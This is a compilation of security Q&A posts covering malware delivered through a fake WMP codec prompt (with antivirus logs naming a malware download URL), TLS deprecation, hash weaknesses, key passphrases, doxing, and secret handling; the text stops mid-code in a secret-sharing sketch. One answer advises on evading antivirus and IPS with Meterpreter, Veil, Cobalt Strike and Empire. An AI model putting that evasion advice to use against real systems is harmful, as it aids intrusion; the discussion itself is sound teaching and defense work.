[Edit] A suggestion from JRsz which shall not be buried in the comments. A good book for beginners: http://crypto-textbook.com/
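To make the "always check what others did" advice concrete: whenever you implement a primitive yourself, test it against a reference implementation and published test vectors. Below is a small Python sketch (my own illustration, not from the HAC) that builds HMAC-SHA256 by hand from the hashlib primitive and checks it against the standard library:

    import hashlib
    import hmac as stdlib_hmac

    BLOCK = 64  # SHA-256 block size in bytes

    def my_hmac_sha256(key: bytes, msg: bytes) -> bytes:
        # RFC 2104: hash the key down if it is longer than one block, then zero-pad it
        if len(key) > BLOCK:
            key = hashlib.sha256(key).digest()
        key = key.ljust(BLOCK, b"\x00")
        ipad = bytes(b ^ 0x36 for b in key)
        opad = bytes(b ^ 0x5C for b in key)
        inner = hashlib.sha256(ipad + msg).digest()
        return hashlib.sha256(opad + inner).digest()

    # Compare the toy implementation against the standard library's reference.
    for key, msg in [(b"key", b"The quick brown fox"), (b"k" * 100, b""), (b"", b"x")]:
        assert my_hmac_sha256(key, msg) == stdlib_hmac.new(key, msg, hashlib.sha256).digest()
    print("toy HMAC-SHA256 matches the reference implementation")

The same habit (reference implementations plus official test vectors, e.g. the NIST ones for SHA-2 and AES) will catch most basic implementation mistakes long before you start worrying about side channels.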
{ "source": [ "https://security.stackexchange.com/questions/106186", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92607/" ] }
106,188
I've downloaded a .wmv file using P2P. Attempting to play it with Media Player Classic (K-Lite Codec Pack) only gave me a green square in the playback window: I noticed that the video came with a readme file, however; I found the following inside: This video has been encoded using the latest DivX+ software, if you are having trouble playing this video please try windows media player Media Player should automatically update any out dated codecs Since the K-Lite Codec Pack is my media software of choice, I decided to visit their site to see if there was an upgrade available. Indeed, the latest version at the moment of writing was released on November 19th 2015 (the version I was using had been installed on my PC at the beginning of November because I'd bought a new hard drive and reinstalled the OS). I've downloaded and installed the update, but nothing changed, I still got the same green square. Now, this part I am ashamed of; instead of getting suspicious, I did what the file suggested, i.e. ran it in WMP, which indeed suggested that I download some codecs. I let it do it, typed the admin password because my account is a regular one, and then a few interesting things happened. UAC has been disabled without me doing anything; Windows showed a prompt telling me that I need to reboot to disable it, and when I checked the settings, it has indeed been turned off Opera Browser has been installed and a shortcut was put on my desktop NOD32, the AV I'm using, went crazy: two HTTP requests have been blocked and two executables quarantined, logs follow: Network: 15/11/22 3:35:29 PM http://dl.tiressea.com/download/dwn/kmo422/us/setup_ospd_us.exe Blocked by internal IP blacklist C:\Users\admin\AppData\Local\Temp\beeibedcid.exe desktop\admin 37.59.30.197 15/11/22 3:35:29 PM http://dl.tiressea.com/download/dwn/kmo422/us/setup_ospd_us.exe Blocked by internal IP blacklist C:\Users\admin\AppData\Local\Temp\beeibedcid.exe desktop\admin 37.59.30.197 Local files: 15/11/22 3:35:38 PM Real-time file system protection file C:\Users\admin\AppData\Local\Temp\81448202922\1QVdFL1BTSQ==0.exe a variant of Win32/Adware.ConvertAd.ACN application cleaned by deleting - quarantined desktop\admin Event occurred on a new file created by the application: C:\Users\admin\AppData\Local\Temp\beeibedcid.exe. 15/11/22 3:35:35 PM Real-time file system protection file C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\51L9SWGF\VOPackage 1 .exe a variant of Win32/Adware.ConvertAd.ACN application cleaned by deleting (after the next restart) - quarantined desktop\admin Event occurred on a new file created by the application: C:\Users\admin\AppData\Local\Temp\beeibedcid.exe. beeibedcid.exe had been running as a process before I killed it manually using the task manager. Even though ESET didn't touch it, it's no longer in AppData\Local\Temp . Upon closer inspection, I realized that the prompt WMP opens to allow me to "update my codecs" doesn't look like a WMP component: The UI differs in certain subtle ways, and the sentence composition/syntax is poor. Undeniably though the most suspicious thing is the domain in the upper left corner, playrr.co ; a simple whois lookup reveals that the domain has been registered on November 17th this year - five days ago - and the registrant is WhoisGuard, so the actual registrant clearly wanted to conceal their details. 
Note that clicking both "Download Fix" and "Web Help" has the same effect; the following IE download prompt pops up: I should add that the video I downloaded had been uploaded on 2015-11-22 13:29:23 GMT, roughly an hour before I downloaded it. The OS is Windows 8.1 Pro x64 and the AV is ESET Nod32 AV 7.0.302.0, with the latest signatures. I'm annoyed at myself because this is a fairly obvious trap, but at the same time I'd never think to check Windows Media Player dialogs for obvious trojan/adware! How does this thing work? It couldn't have possibly affected my Windows Media Player executable before it was played because it's a media file. Is this a recent vulnerability discovered in the software? Because I doubt Microsoft would allow media files to specify a site to download codecs from... No matter what it is, it seems to be a relatively new thing. What can I do to ensure others don't fall for this? I don't think any AV vendor would allow me to submit a .wmv file a few hundred megabytes in size for analysis. Thanks for your time.
This video file uses (well, abuses) Windows Media Player's DRM functionality, which allows content providers to embed a URL in their protected content that will be displayed in a Windows Media Player window to allow the user to acquire a license to play the content. Its legitimate usage goes like this:

- the user registers on an online music store and downloads some DRM-protected files, which have their actual media content encrypted
- the user opens them in Windows Media Player, which opens a window with the URL specified in the media file, in this case a legitimate URL from the music store which asks for the user's login
- the user enters his credentials, the music store authenticates them and gives WMP the decryption key, which is then cached, and the file can now be played

In this case, the feature has been abused to display a fake WMP error about missing codecs (it's in reality a webpage, as the domain name in the top bar suggests, and if it was real the window would've been much smaller) to make you click a (fake) button that points to malware masquerading as codecs.

There's some more info about this DRM system on Wikipedia, and it seems to be deprecated in favour of PlayReady. Whether this new iteration will allow such abuse isn't yet known.
{ "source": [ "https://security.stackexchange.com/questions/106188", "https://security.stackexchange.com", "https://security.stackexchange.com/users/90916/" ] }
106,310
The PCI Data Security Standard 3.1 recommends disabling "early TLS" along with SSL: SSL and early TLS are not considered strong cryptography and cannot be used as a security control after June 30, 2016. The Migrating from SSL and Early TLS supplement states: The best response is to disable SSL entirely and migrate to a more modern encryption protocol, which at the time of publication is a minimum of TLS v1.1, although entities are strongly encouraged to consider TLS v1.2. I have a few questions regarding the deprecation of TLS 1.0: What is the reason for this recommendation? Are there known vulnerabilities with the TLS 1.0 protocol? (I'm aware that some faulty TLS implementations are vulnerable to POODLE but a SSL Labs scan indicated that my site was not vulnerable.) Is it necessary/desirable to apply this standard to web applications using HTTPS that are not handling credit card information? Is disabling TLS 1.0 and restricting to TLS 1.1 or 1.2 on public-facing websites using HTTPS likely to break browser compatibility for a significant proportion of users?
TLS 1.0 when properly configured has no known security vulnerabilities. Newer protocols are better designed and better address the potential for new vulnerabilities. So that's why I wouldn't personally recommend disabling TLS 1.0, primarily because IE 7-10 don't support TLS 1.1 out of the box. In January 2020, IE10 has gone EOL, so I expect it's likely now a good idea to disable TLS 1.0 since there's likely little/no traffic from such an old browser. If you look carefully at the support matrix at: https://en.wikipedia.org/wiki/Transport_Layer_Security#Web_browsers you'll see that TLS 1.1 is disabled by default on everything but IE 11. Most people have a significant amount of traffic on these browsers, and your website suddenly not working would pose a significant business impact. Many people here will advocate a single minded approach of "Security above all else", and tell you to strongly advocate for disabling TLS 1.0. I'm of the belief that security needs to be balanced with business needs, and it's the job of the security professional to understand both the security side, and the impact of changes. As of 2020, the general principle here still applies, but the tradeoffs have moved towards disabling TLS1.0 in most circumstances. There may still be some special circumstances of old, embedded devices where you might be able to justify keeping TLS1.0 enabled. In 2020, there's little reason to keep TLS1.0 around, at least for browsers as the client. You obviously need to test the impact of this on the stock browser config, and understand how much business you may or may not lose from this change.
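If you do decide to experiment with disabling TLS 1.0, measure the impact first and verify the result afterwards. Here is a rough Python sketch for checking which protocol versions a server still accepts (illustrative only: the hostname is a placeholder, and a very new OpenSSL build on the client may itself refuse to offer TLS 1.0):

    import socket
    import ssl

    def accepts_version(host, port, version):
        # Offer exactly one protocol version and see whether the handshake succeeds.
        try:
            ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
            ctx.check_hostname = False
            ctx.verify_mode = ssl.CERT_NONE   # we only care about protocol support here
            ctx.minimum_version = version
            ctx.maximum_version = version
            with socket.create_connection((host, port), timeout=5) as sock:
                with ctx.wrap_socket(sock, server_hostname=host) as tls:
                    return tls.version()
        except (ValueError, OSError):
            return None

    host = "www.example.com"   # placeholder, use your own site
    for name, ver in [("TLS 1.0", ssl.TLSVersion.TLSv1),
                      ("TLS 1.1", ssl.TLSVersion.TLSv1_1),
                      ("TLS 1.2", ssl.TLSVersion.TLSv1_2)]:
        print(name, "accepted" if accepts_version(host, 443, ver) else "rejected/unavailable")

Comparing the result with your web server logs (which clients actually negotiated TLS 1.0 recently) gives you the business-impact side of the decision.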
{ "source": [ "https://security.stackexchange.com/questions/106310", "https://security.stackexchange.com", "https://security.stackexchange.com/users/36600/" ] }
106,382
A person has good knowledge of overall security risks, knows what the OWASP Top 10 vulnerabilities are, and has certifications like CEH, CISSP, OSCP, etc., which are more oriented towards black-box testing. He has also gone through the OWASP Testing Guide, Code Review Guide, etc. and the cheat sheets. Will he be able to perform a secure code review without knowledge of, and mastery over, multiple programming languages?
It depends on what is meant by "secure source code analysis." One can do anything one pleases. The issue, I presume, is when someone else has asked for something called "secure source code analysis," and one wonders why one is not qualified for it. In many cases, such analysis must be done by a Subject Matter Expert (SME). In the final product, an SME will deliver a statement basically saying "I declare this code to be secure," with the understanding that this is a more profound statement than "I looked for a bunch of known patterns, and found no problems."

If you were interested in the authentic translation of a Chinese philosophy, would you trust an individual who knew a great deal about philosophy, and had a bunch of cheat sheets to help decipher it, but did not actually know Chinese?

One great example that comes to mind is a bug that hit a SQL engine. Forgive me for not having the name of the engine, or the version, so you can verify; I have had trouble finding it since. However, the error was poignant. The error was in code that looked like this:

    int storeDataInCircularBuffer(Buffer* dest, const char* src, size_t length)
    {
        if (dest->putPtr + length < dest->putPtr)
            return ERROR; // prevent buffer overflow caused by overflow

        if (dest->putPtr + length > dest->endPtr) {
            ... // write the data in two parts
            return OK;
        } else {
            ... // write the data in one part
            return OK;
        }
    }

This code was intended to be part of a circular buffer. In a circular buffer, when you reach the end of the buffer, you wrap around. Sometimes this forces you to break the incoming message into two parts, which is okay. However, in this SQL program, they were concerned with the case where length could be large enough to cause dest->putPtr + length to overflow, creating an opportunity for a buffer overflow because the next check wouldn't work right. So they put in a test: if (dest->putPtr + length < dest->putPtr). Their logic was that the only way this statement could ever be true is if an overflow occurred, thus we catch the overflow.

This created a security hole that actually got exploited, and had to be patched. Why? Well, unbeknownst to the original author, the C++ spec declares that overflow of a pointer is undefined behavior, meaning the compiler can do anything it wants. As it so happened, when the original author tested it, gcc actually emitted the correct code. However, a few versions later, gcc did have optimizations to leverage this. It saw that there was no defined behavior where that if statement could pass its test, and optimized it out! Thus, for a few versions, people had SQL servers which had an exploit, even though the code had explicit checks to prevent said exploit!

Fundamentally, programming languages are very powerful tools that can bite the developer with ease. Analyzing whether this will occur does require a solid foundation in the language in question.

(Edit: Greg Bacon was great enough to dig up a CERT warning on this: Vulnerability Note VU#162289, "C compilers may silently discard some wraparound checks", and also this related one. Thanks Greg!)
{ "source": [ "https://security.stackexchange.com/questions/106382", "https://security.stackexchange.com", "https://security.stackexchange.com/users/44591/" ] }
106,525
I am using the following command in order to generate a CSR together with a private key by using OpenSSL : openssl req -new -subj "/CN=sample.myhost.com" -out newcsr.csr -nodes -sha512 -newkey rsa:2048 It generates two files: newcsr.csr privkey.pem The generated private key has no password: how can I add one during the generation process? Note: take into account that my final goal is to generate a p12 file by combining the certificate provided according to the CSR and the private key (secured with a password).
Ditch "-nodes"

If you actually WANT encryption, then you'll need to remove the (awkwardly named) -nodes (read: "No DES encryption") parameter from your command. Because -nodes will result in an unencrypted privkey.pem file. And if you leave it out, then the file will be encrypted. So without -nodes openssl will just PROMPT you for a password like so:

    $ openssl req -new -subj "/CN=sample.myhost.com" -out newcsr.csr -sha512 -newkey rsa:2048
    Generating a RSA private key
    .........................................+++++
    ................+++++
    writing new private key to 'privkey.pem'
    Enter PEM pass phrase:
    Verifying - Enter PEM pass phrase:
    -----

But interactive prompting is not great for automation. So if you don't want to be prompted then you might want to read on for how to use "Pass Phrase arguments".

Use OpenSSL "Pass Phrase arguments"

If you want to supply a password for the output file, you will need the (also awkwardly named) -passout parameter. This is a multi-dimensional parameter and allows you to read the actual password from a number of sources, such as from a file, from an environment variable, or straight from the command line (least secure). Below are examples for each of these usages. (The official manpage lists even more password sources in the "Pass Phrase Options" section (archived here).)

Example: password from command line with "pass:"

    $ openssl req -new -passout pass:"Pomegranate" -subj "/CN=sample.myhost.com" -out newcsr.csr -sha512 -newkey rsa:2048
    Generating a 2048 bit RSA private key
    ................................................................................................................................+++
    ......................+++
    writing new private key to 'privkey.pem'
    -----
    $ openssl rsa -in privkey.pem -passin pass:'Pomegranate' | head -n2
    writing RSA key
    -----BEGIN RSA PRIVATE KEY-----
    MIIEpQIBAAKCAQEAsSP5kLRPP8wPODrnvuAeeoqGMqTOvRULL423vv6+zjYhwPUi

Example: password from variable with "env:"

    $ export MYPASS='Elderberry'
    $ openssl req -new -passout env:MYPASS -subj "/CN=sample.myhost.com" -out newcsr.csr -sha512 -newkey rsa:2048
    Generating a 2048 bit RSA private key
    ............................+++
    .....................+++
    writing new private key to 'privkey.pem'
    -----
    $ openssl rsa -in privkey.pem -passin pass:'Elderberry' | head -n2
    writing RSA key
    -----BEGIN RSA PRIVATE KEY-----
    MIIEpQIBAAKCAQEAv0NnBnigPp+O9G4UXc0qSyeELdJJjTmnO9GEtE5GlPGoK7vW

Example: password from file with "file:"

    $ echo "Farkleberry" > password.txt
    $ openssl req -new -passout file:password.txt -subj "/CN=sample.myhost.com" -out newcsr.csr -sha512 -newkey rsa:2048
    Generating a 2048 bit RSA private key
    ......................+++
    ...........+++
    writing new private key to 'privkey.pem'
    -----
    $ openssl rsa -in privkey.pem -passin pass:'Farkleberry' | head -n2
    writing RSA key
    -----BEGIN RSA PRIVATE KEY-----
    MIIEpAIBAAKCAQEAsHICgYvqe4i9CIR5eQk38JJmuTaJQvyxPH9S+BahT5XWh88z

Related Reading

https://stackoverflow.com/questions/4294689/how-to-generate-an-openssl-key-using-a-passphrase-from-the-command-line
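Since the question mentions that the final goal is a .p12 bundle: once the CSR has been signed and you have the certificate back, the usual way to combine it with the encrypted key is openssl pkcs12 -export. If you prefer doing it programmatically, here is a sketch using the pyca/cryptography Python library; the file names cert.pem and bundle.p12 are just assumptions for illustration:

    from cryptography.hazmat.primitives.serialization import (
        BestAvailableEncryption,
        load_pem_private_key,
        pkcs12,
    )
    from cryptography.x509 import load_pem_x509_certificate

    key_passphrase = b"Pomegranate"      # whatever you used with -passout / the PEM prompt
    p12_passphrase = b"something-else"   # password protecting the resulting .p12

    with open("privkey.pem", "rb") as f:
        key = load_pem_private_key(f.read(), password=key_passphrase)

    with open("cert.pem", "rb") as f:    # assumed name of the certificate issued for the CSR
        cert = load_pem_x509_certificate(f.read())

    p12_bytes = pkcs12.serialize_key_and_certificates(
        name=b"sample.myhost.com",
        key=key,
        cert=cert,
        cas=None,
        encryption_algorithm=BestAvailableEncryption(p12_passphrase),
    )

    with open("bundle.p12", "wb") as f:
        f.write(p12_bytes)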
{ "source": [ "https://security.stackexchange.com/questions/106525", "https://security.stackexchange.com", "https://security.stackexchange.com/users/47506/" ] }
106,526
Assuming that I'm using a trusted USB flash drive (meaning that it's not some device that looks like a USB drive and whose purpose is to damage my PC), is it possible for my PC to get infected from some malware picked up by the USB if I'm running an antivirus program that doesn't allow any autorun.inf files to run from the USB drive? I have two PCs, one running Windows 10 and the other running Windows 8.1.
Short answer: YES.

You can be infected even with a fully patched Windows system and an updated antivirus. This happened before and can happen again. A few years ago, the Stuxnet worm was specially engineered to attack the Iranian nuclear facilities. They got hit by using infected USB drives, without autorun.inf or executing anything by hand.

Those vulnerabilities are called zero-days. The attacker knows about them, but the vendor and the antivirus companies do not. But those vulnerabilities are highly prized and will not be used on a low-value target, because as soon as the attack is detected, it's not a zero-day anymore. If you are not a high-value target, you usually don't have to worry about being hit by a zero-day. Usually you will get hit by a social engineering attack, and you will probably walk into the trap yourself, like opening an executable file with the icon of a pdf or a picture...
{ "source": [ "https://security.stackexchange.com/questions/106526", "https://security.stackexchange.com", "https://security.stackexchange.com/users/92964/" ] }
106,689
I’m not talking about server-side security or even necessarily XSS vulnerabilities, as these are attacks on vulnerable services and do not use any pre-existing vulnerabilities on the client side to affect an end user. They will exist as long as web developers keep making vulnerable web applications. I want to focus on the security of the end-user in these two different scenarios: Flash installed and enabled, but JavaScript disabled JavaScript enabled, Flash not installed or enabled I am interested in the answers that I might get from posing a type of question that requires the comparison of two almost completely different (internally), yet competing technologies, in terms of end-user security.
In theory, if all servers and connections to them were perfectly secure (impossible) and trustworthy (not true), neither one would be more "secure" than the other - mainly because the developer(s) of the website are in full control of the content of the site. Since Flash and the JS is served to clients, the server would have to serve malicious content to the end user in order for the end user to be affected. Sadly, we don't live in a perfect world and JS tends to be more secure in the case of a server compromise - it is far more limited in its ability to affect the client. Many Flash vulnerabilities have the ability to execute arbitrary code, which is far more damaging than browser exploits, which often require multiple vulnerabilities to break out of the sandbox. This means that JS exploits often can only manipulate the client while the client is viewing that page and is usually unable to persist after it is closed, whereas Flash exploits can infect clients with RATs or other malware, which enables the attacker to have control over the client even after the browser is closed. Another benefit of using JS is that the source is viewable by clients. Someone using the site may notice something suspicious in the source and notify the developers, allowing for the intrusion to be more easily detected. In the case of Flash, a malicious attacker can inject malicious code into an existing swf and since users cannot view the source without dissembling the swf, malicious code may go undetected for longer. For an end-user, scenario 2: JavaScript enabled, Flash not installed or enabled would be much safer for the reasons above and given Adobe Flash's history of exploits. A search in the NVD reveals a total of 610 vulnerabilities , 330 of which are between January 2014 and December 2015. Most JS-related exploits tend to be browser specific, which reduces the number of clients affected, while Flash is meant to be cross-platform, which increases the number of affected clients (less nowadays, considering that many people have Flash disabled). TLDR: Keep Flash off and use JS instead.
{ "source": [ "https://security.stackexchange.com/questions/106689", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93108/" ] }
106,737
I just received a .jpg file that I'm almost positive contains a virus, so I have two questions about what I am able to do with the image. My first question originates from the fact that I opened the file once and the program I used to open it gave the error "invalid or corrupt image". So I want to know whether or not it's possible that a virus contained inside the image could still have been executed if the software did not 'fully' open the image? My second question is if there is any way to decode/decompile the image data in order to better view its contents. Currently I'm using Notepad++; I just opened the file and am looking at its raw contents, which is one of the reasons why I'm so confident it's a virus. So is there a better way to find out what the virus does and how it works? I need to know whether or not my security has been compromised.

EDIT: Reasons why I think it contains a virus:

- It's way bigger than the image I was expecting
- Scan
- Looking at contents in Notepad (file)
- The way the person who gave me the file acted
Based on the description at Virustotal you've linked to, this is in reality not an image, but a real PE32 executable (a normal Windows executable). So only the file name extension was changed to hide the real purpose of the file.

PE32 files will not be automatically executed when they have the .jpg extension, like in this case. Also, the image viewer which will be invoked with the file by default will not execute the code, but instead exit or complain that this is not a valid image. Thus this file would not work alone. But such files are typically used together with another file which will rename it to name.exe and execute it. This can be done by some batch file, with the help of the Windows Scripting Host, ActiveX inside a website or mail, or similar. This strategy is used to bypass antivirus and firewalls, which might skip analyzing the "jpg" file because of the extension and will not find anything suspicious in the accompanying script (which only renames the file and executes it).

...if there is any way to decode/decompile the image data

Again, this is not an image but an executable, so the tool of choice could be some disassembler, debugger, sandboxed execution etc. See also the analysis from Virustotal.
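If you want to do this kind of first-pass check yourself before ever opening a suspicious file, looking at the first few bytes is usually enough: a JPEG starts with the bytes FF D8 FF, while a Windows PE executable starts with the ASCII letters "MZ". A small Python sketch of the idea (the file name is a placeholder):

    def sniff_file_type(path):
        # Very rough type check based on magic bytes; not a substitute for a real scanner.
        with open(path, "rb") as f:
            magic = f.read(4)
        if magic[:2] == b"MZ":
            return "PE executable (starts with the 'MZ' DOS header)"
        if magic[:3] == b"\xff\xd8\xff":
            return "JPEG image"
        return "something else (first bytes: %s)" % magic.hex()

    print(sniff_file_type("suspicious.jpg"))   # placeholder path

The 'file' command on Linux does the same job far more thoroughly, and Virustotal will of course also tell you the real file type.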
{ "source": [ "https://security.stackexchange.com/questions/106737", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93150/" ] }
106,748
I have been asked to post this here: I want to focus on the security of the end user in these two different scenarios:

1) Pre-HTML5, where the applications and so on lived in plug-ins outside the browser sandbox, by way of Flash and Java installed and enabled.

2) Post-HTML5, with applications being moved into the browser sandbox, so you no longer need to breach the browser environment to get at this data and these applications, and with hooks into system hardware like cameras and so on given directly to the browser by way of HTML- and JS-accessible hooks built into the browser itself.

I'm not talking about server-side security, nor the core OS that may run the browser environment. I am referring to user data and, as the browser becomes the OS as far as the user is concerned, to what they care about keeping safe from attack.

There is a big cry that Flash is insecure (and it is), and that HTML5 is better (but will it stay that way?). As we move all the data and applications into the browsers, and add the hooks to let a web page's JavaScript control hardware in the same way Flash and Java were used, will that hold true? Or will the addition of these features create similar breaches of private data and loss of control of applications stored in the browser, possibly even allowing a remote hack of the browser-as-an-OS setup?

While these breaches could in theory be limited to the browser level, as the browser in effect becomes OS-like to the end user: would the average end user distinguish those attacks from what we see now with Flash and Java? Or would they likely be perceived as the same to the average end user?
{ "source": [ "https://security.stackexchange.com/questions/106748", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93156/" ] }
106,762
These days I am testing various type of client hacking techniques, but in all scenarios I am using Meterpreter variations as payload. Now I can bypass Anti-Virus and Firewalls easily, but Symantec Sonar and IPS always detect Meterpreter payloads and block the attacker IP. Is there any better payload than Meterpreter that can bypass IPS? Is there any payload writing tutorial on the net that matches my needs?
Bypassing AV and IPS can be done through meterpreter or any other RAT. Most of the time meterpreter is handy because first it is open source and second it is implemented as a reflective DLL which insert itself in the exploited process without touching the disk. AV solutions can be bypassed easily through the Veil Evasion project while reverse_https meterpreter can bypass the IPS since the connection is encrypted. You have the option of Stage Encoding for encoding the second stage metsrv.dll as well which can bypass a lot of IPS solutions. Also, the stageless meterpreter over HTTPS is very handy in bypassing the host and network based detection solutions as well. However, sometimes meterpreter being a synchronous payload where the user needs to interact with the session becomes difficult to manage e.g. when client side attacks or campaigns need to be executed over large periods of time. In such cases, you always have the option of using Throwback , Pupy , or the Cobalt Strike's Beacon payload. The advantage of these payloads is that they are asynchronous in nature and all of them are implemented as reflective DLLs which means they can be used with Metasploit through the payload/windows/dllinject/ payload type. And since these payloads are not used as often as the plain meterpreter in the Metasploit source tree, they can bypass many AV and IPS solutions out of the box. Lately, the payloads implemented in pure Powershell can bypass AV as well as IDS/IPS. Powershell Empire is one such payload implemented in pure Powershell. One thing that was missing from Meterpreter is to script the actions in the first stage without contacting the handler. Such a thing is now in the main source with Python meterpreter, and in the coming days, the functionality will be ported to other meterpreter payload types as well. Take a look at my answer at Techniques for Anti Virus evasion for a list of techniques for bypassing AV for further explanation on the topic.
{ "source": [ "https://security.stackexchange.com/questions/106762", "https://security.stackexchange.com", "https://security.stackexchange.com/users/93177/" ] }
106,843
Pretty much every guide, how-to, and reference for dealing with passwords and hashing has a warning in big or bold letters stating something along the lines of: SHA-1 and MD5 are NOT secure and should not be used. Fair enough, it's not much trouble to use SHA-256 or something else. But have there been any examples of said weaknesses actually being successfully used in an attack? Just how much weaker do these vulnerabilities make the algorithms?
I'm not aware of any publicly known attack using a collision in SHA-1, but MD5 collisions were probably already used in attacks in 2010. In 2012 it was discovered that malware from the Flame attack had a valid signature from Microsoft, which was possible due to an MD5 collision attack. See http://blogs.technet.com/b/srd/archive/2012/06/06/more-information-about-the-digital-certificates-used-to-sign-the-flame-malware.aspx for more details.

As for using MD5 or SHA-1 with passwords: simply hash some trivial password with MD5 or SHA-1 and then look up the hash with Google. Example:

    password: "secret"
    md5 (hex):  "5ebe2294ecd0e0f08eab7690d2a6ee69"
    sha1 (hex): "e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4"

The first hit on Google for the MD5 hash presents you with the password, as does the first hit when searching for the SHA-1 hash. Thus typical passwords can easily be detected as long as the hash is not salted.

Apart from that, even SHA-256 is a bad choice for passwords. These kinds of hash algorithms are designed to be fast, which only makes brute-forcing passwords easier. For more details about this topic see How secure are sha256 + salt hashes for password storage.
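For reference, the two digests above are easy to reproduce with a few lines of Python, which also makes it obvious how a salt changes the picture (the salt value below is just an arbitrary illustration):

    import hashlib

    password = b"secret"
    print(hashlib.md5(password).hexdigest())    # 5ebe2294ecd0e0f08eab7690d2a6ee69
    print(hashlib.sha1(password).hexdigest())   # e5e9fa1ba31ecd1ae84f75caaa474f3a663f05f4

    # With even a simple salt, the digest no longer appears in precomputed lookup tables,
    # although a fast hash remains cheap to brute-force offline.
    salt = b"9f8e7d6c"                          # arbitrary example salt
    print(hashlib.sha1(salt + password).hexdigest())

For actual password storage you would use a deliberately slow, salted construction such as bcrypt, scrypt, PBKDF2 or Argon2 instead.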
{ "source": [ "https://security.stackexchange.com/questions/106843", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87083/" ] }
106,847
Doxing (publicly releasing private information about an individual, to make it easier to harass them) is becoming an increasingly popular tactic not just for hackivists and Anonymous, but also for petty individual revenge. What are actionable, best practice steps that an individual should take to regain control of their personal information after they have been doxxed? A lot of social engineering advice is predicated on not releasing such information, or controlling access to it — clearly useless to a victim in this situation. If details are needed, assume the following are present in the document dump: Name, physical address, telephone number Facebook profile, email address Work history including contact numbers for employers past and current Family members, their relationship and address or phone number Assume that the victim was the victim of a personal attack, rather than a corporate breach, and thus has no IT or legal resources to draw upon.
Once your information is made public, you cannot make it private again. That is unfortunately one of the things the Internet gives us. You can make formal complaints to sites hosting the information, but assume it will be there, available in large stores of PII, for bad guys to do with as they will. So all you can do is decide which of those things you need to change, eg by moving house, changing your name, job, mobile phone number etc. Personally, the only ones I'd want to change if I was under a personal attack would be email and phone numbers. If the attack grew to be physical, I'd get the police involved and if necessary, move and change my name.
{ "source": [ "https://security.stackexchange.com/questions/106847", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70682/" ] }
106,855
I work as the primary developer and IT administrator for a small business. I want to ensure that business can continue even if I suddenly become unavailable for some reason. Much of what I do requires access to a number of servers, (through key-based ssh), cloud services, and other secure infrastructure of applications. Some of these services use MFA, either using dedicated MFA apps (like Amazon) or SMS. How do I ensure that my "hit by a bus" plan and documentation is complete and comprehensive, but that this documentation is not itself a security risk? The documentation will be hosted on a shared file server behind our VPN, but that can also be accessed using a third party web frontend that puts a "DropBox"-like interface on top of the base file server (i.e. authentication, desktop syncing, file sharing, etc). The files are in a location where only I, and other file server administrators can see them. How should I manage the "secrets" (passwords, private keys, MFA access) in this documentation to ensure it remains comprehensive without compromising security?
My advice would be to remove the secrets from the drop-box and store them elsewhere. Your instructions have to be easily human-readable by anyone, but they can include instructions on how to get access to the properly secured part of the data. That lets you separate the accessibility side of things from the security side.

Once you can think about security on its own, you can start to ask the real question of how much you need to protect these keys. This is a business logic question, so consult your management. You might:

- Have a password to a file that everyone knows.
- Have a file set up with multiple passwords so that each individual maintains their own copy.
- Have a file locked by an M-out-of-N algorithm (the digital equivalent of requiring two keys to unlock a safe; see the sketch at the end of this answer).
- Have an M-out-of-N algorithm with one 'master' password required regardless of which group of individuals unlocks the file, and that one master is physically kept in a tamper-evident safe that you check every now and then.

Use creativity here. Whatever you do, the decoupling of "instructions" from "sensitive information" frees you to properly safeguard the information, and then provide instructions on how to get that data later.

Your business logic decisions will also include uptime questions. If something goes wrong in your life, how long does another admin have to take over your work before business is affected? Consider how well replicated you want these instructions and sensitive information to be in case of server glitches. When I was administering a server and needed to store instructions on how to restore it from backup, I used the server's own wiki to store that information for easy viewing, but obviously that wouldn't be so useful in a glitch scenario, so I also had a copy on the dev VM of that machine, saved off copies of it on 3 separate PCs, and kept a printout. I couldn't guarantee the printout would stay up to date, but I made sure that I could do my best.

This also points out something which is not always part of a hit-by-a-bus plan: graceful degradation. Not all hit-by-the-bus scenarios involve getting hit by a bus. Some involve you just being inaccessible at an unfortunate time. Some involve you leaving the company, but being available for a question or two. Others... do not. Consider layering the plan. Small mishaps may be very well protected, while greater mishaps may still result in business loss while everyone gets things together, but nothing permanent. To use my backup restoration plan as an example, the printed version was almost guaranteed not to be fully up to date. But if lightning wiped out every computer for a city block, it was still more helpful than nothing. On the other hand, if the server just threw a harddrive, and I had to restore from backup, the version I kept sync'd on the dev box was almost certainly up to date.

Example of this failing: I was a user on a network managed by Kerberos, run by an admin who was distrustful of others and did not have a hit-by-a-bus plan. When he... left, we had a hacking party to try to break into his server. In the end, our best impromptu hit-by-a-bus plan was to wipe the machines (every one of them) and start from scratch. Note that, while this wasn't the best plan (in fact, I think it's the worst plan?), the business kept moving. We just stagnated for about two days and had a bunch of grumpy customers. In the words of Frank Herbert's Dune, "The spice must flow."
Even in the worst case (which may involve a curious incident involving your server's harddrive flung out of the bus and hitting you on the head, destroying all record of the hit-by-a-bus plan), business does have a way to keep moving... but I approve of trying to raise the bar a wee bit more than that!
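To make the M-out-of-N option mentioned above a bit more concrete, here is a minimal Python sketch of Shamir's secret sharing, which is one standard way to implement it. This is an illustration only; for real use you would reach for a vetted library or tool (the ssss utility, for example) rather than hand-rolled crypto.

    import secrets

    PRIME = 2**521 - 1   # a Mersenne prime; the secret, as an integer, must be smaller than this

    def split_secret(secret_int, m, n):
        # Split secret_int into n shares; any m of them can reconstruct it.
        coeffs = [secret_int] + [secrets.randbelow(PRIME) for _ in range(m - 1)]
        def poly(x):
            acc = 0
            for c in reversed(coeffs):        # Horner evaluation of the random polynomial
                acc = (acc * x + c) % PRIME
            return acc
        return [(x, poly(x)) for x in range(1, n + 1)]

    def recover_secret(shares):
        # Lagrange interpolation at x = 0 recovers the constant term, i.e. the secret.
        total = 0
        for i, (xi, yi) in enumerate(shares):
            num, den = 1, 1
            for j, (xj, _) in enumerate(shares):
                if i != j:
                    num = num * (-xj) % PRIME
                    den = den * (xi - xj) % PRIME
            total = (total + yi * num * pow(den, PRIME - 2, PRIME)) % PRIME
        return total

    secret = int.from_bytes(b"vault-passphrase", "big")   # toy example secret
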